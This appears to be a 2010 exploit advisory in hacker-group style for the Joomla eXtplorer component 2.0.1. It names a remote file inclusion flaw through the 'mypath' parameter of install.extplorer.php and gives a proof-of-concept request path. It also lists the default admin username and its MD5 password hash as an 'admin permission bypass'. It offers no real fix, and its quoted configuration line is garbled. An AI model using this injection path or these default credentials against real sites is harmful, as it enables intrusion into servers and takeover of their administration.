Joomla component com_extplorer_2.0.1_pt-BR <= Multiple Vulnerability

====================================================================
Joomla component com_extplorer_2.0.1_pt-BR <= Multiple Vulnerability
====================================================================


#################################################################
 
Link:   http://joomlacode.org/gf/project/joomlaxplorer
Version:    2.0.1_pt-BR
Project:    http://sourceforge.net/projects/extplorer
License:    GPL/MPL
 
#################################################################
 
Author: eidelweiss
Date:   2010/03/23 9:50 AM (GMT+7)
Contact:    eidelweiss[at]cyberservices[dot]com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
Special:    AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)
Dedicat:    psychotic_girls (dodol gue td lg sarapan , nih hasil gue coding pas nungguin loe td)
 
#################################################################
    RFI
#################################################################
-=[ BUG ]=-
 
[+] install.extplorer.php
 
-=[ VULN ]=-
 
    require_once($mypath . "/include/functions.php");
    require_once($mypath . "/libraries/Archive/archive.php");
 
 
-=[ P0C ]=-
 
    ../administrator/components/com_extplorer/install.extplorer.php?mypath= [inj3ct0r]
#################################################################
    bypass admin permision
#################################################################
Users can be defined by using the Admin-section
 
$GLOBALS["users"]=array ($_SERVER['DOCUMENT_ROOT'])?realpath(dirname(__FILE__).'/..'):$_SERVER['DOCUMENT_ROOT'],"http://localhost",1,"",7,1),
user:   admin
pass:   21232f297a57a5a743894a0e4a801fc3 // md5
#################################################################
[ FIX ] Use Your Skill and Play Your Imagination
#################################################################